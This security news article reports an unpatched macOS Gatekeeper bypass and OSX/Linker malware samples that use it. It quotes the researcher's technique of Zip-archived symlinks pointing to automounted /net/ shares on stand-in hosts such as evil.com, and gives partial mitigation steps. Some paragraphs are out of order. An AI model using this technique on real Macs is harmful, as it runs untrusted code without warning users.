Cybersecurity researchers from Intego are warning about possible active exploitation of an unpatched security vulnerability in Apple’s macOS Gatekeeper security feature details and PoC for which were publicly disclosed late last month.
Intego team last week discovered four samples of new macOS malware on VirusTotal that leverage the GateKeeper bypass vulnerability to execute untrusted code on macOS without displaying users any warning or asking for their explicit permission.
However, the newly discovered malware, dubbed OSX/Linker, has not been seen in the wild as of now and appears to be under development.
Though the samples leverage unpatched Gatekeeper bypass flaw, it does not download any malicious app from the attacker’s server.
According to Joshua Long from Intego, until last week, the “malware maker was merely conducting some detection testing reconnaissance.”
“One of the files was signed with an Apple Developer ID (as explained below), it is evident that the OSX/Linker disk images are the handiwork of the developers of the OSX/Surfbuyer adware,” Long said in a blog post.
However, since the malware sample links to a remote server from where it downloads the untrusted app, attackers can also distribute same samples to real targeted by merely replacing the defined sample app with a malware app on their server.
MacOS Gatekeeper Bypass Vulnerability
GateKeeper is a security feature built into Apple macOS that enforces code signing and verifies downloaded applications before allowing them to run, helping users protect their systems from malware and other malicious software.
That means, if you download an application from the Internet, GateKeeper will only allow it to execute without any warnings if it has been signed with a valid Apple-issued certificate, otherwise will prompt you to allow or deny the execution.
Proof of Concept
The flaw is tied to Apple Gatekeeper’s support of external drives and network shares.
Both are viewed as safe locations that allow any applications contained in them to run, according to Cavallarin.
In a proof-of-concept attack the researcher was able to couple this with a second feature “automount” to create an attack scenario.
“The first legit feature is automount (aka autofs) that allows a user to automatically mount a network share just by accessing a ‘special’ path, in this case, any path beginning with ‘/net/’. For example ls /net/evil-attacker.com/sharedfolder/ will make the OS read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS,” Cavallarin describes.
Next, the researcher points out that a Zip archive can contain “symbolic links pointing to an arbitrary location (including automount endpoints) and that the software on macOS that is responsible to decompress Zip files do not perform any check on the symlinks before creating them.”
Symlinks, also known as Symbolic links, are macOS files that point to (or can be crafted to point to) files or directories in other locations on your system.
The author posted a video demonstration of the vulnerability.
However, Gatekeeper has been designed to treat both external drives (USB or HDD) and network shares as “safe locations” from where users can run any application without involving GateKeeper’s checks and prompts.
The attack involves the adversary to create a specially crafted Zip archive that combines a “symbolic” link to an automount endpoint that the attacker controls.
The malicious link path sent to the victim, for example, might follow the convention “ex Documents -> /net/evil.com/Documents.”
“Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this technique very effective and hard to spot,” Cavallarin wrote.
Mitigation against these attacks is fairly simple and includes a three-step process that involves disabling automount.
- “Edit /etc/auto_master as root
- Comment the line beginning with ‘/net’
Filippo Cavallarin, an independent security researcher, late last month publicly revealed a way to exploit this behavior by combining it with two other legitimate features of macOS operating system, which are: